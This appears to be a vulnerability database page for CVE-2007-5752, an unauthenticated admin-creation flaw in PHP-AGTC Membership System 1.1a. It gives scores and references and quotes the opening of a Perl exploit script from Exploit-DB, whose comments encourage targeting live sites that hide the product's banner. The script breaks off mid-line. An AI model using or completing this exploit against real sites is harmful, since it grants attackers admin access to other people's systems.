CVE-2007-5752
Published 2007-10-31
Priority P347 · high · 7.5 CVSS 2.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.81% (84.7th percentile)
adduser.php in PHP-AGTC Membership (AGTC-Membership) System 1.1a does not require authentication, which allows remote attackers to create accounts via a modified form, as demonstrated by an account with admin (userlevel 4) privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agtc_websolutions | php-agtc_membership_system | — | — |
No detection rules found.
Exploit-DB
PHP-AGTC Membership System 1.1a - Arbitrary Add Admin
exploitdb·2008-05-18
---
#!/usr/bin/perl
# Note: adduser.php is accessible to a guest/any-user, but if you access through a browser you can't add admin; there's a hidden POST buried in the script, which contains the userlevel.
# Note: a lot of sites run this script and they remove the "powered by" dork. Also you can get access to a lot of nice sites' member sections using this, since it's a member management script.
use strict;
use LWP::UserAgent;
print "-+--[ PHP AGTC-Membership System );
print "\nAdmin Username(create's your admin username): ";
chomp(my $usr=<STDIN>);
print "\nAdmin Password(create's your admin password): ";
chomp(my $pwd=<STDIN>);
my $email = "user".int(rand(9999))."\@localhost.com"; # generates a random email, if a attacker has already exploited t
Exploit-DB
PHP-AGTC Membership System 1.1a - Remote Add Admin
exploitdb·2007-10-30
---
AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit
User Name:
Password:
Email Address:
# milw0rm.com [2007-10-30]
References
http://secunia.com/advisories/27430
http://securityreason.com/securityalert/3326
http://www.securityfocus.com/archive/1/482919/100/0/threaded
http://www.securityfocus.com/bid/26255
https://exchange.xforce.ibmcloud.com/vulnerabilities/38173
Published: 2007-10-31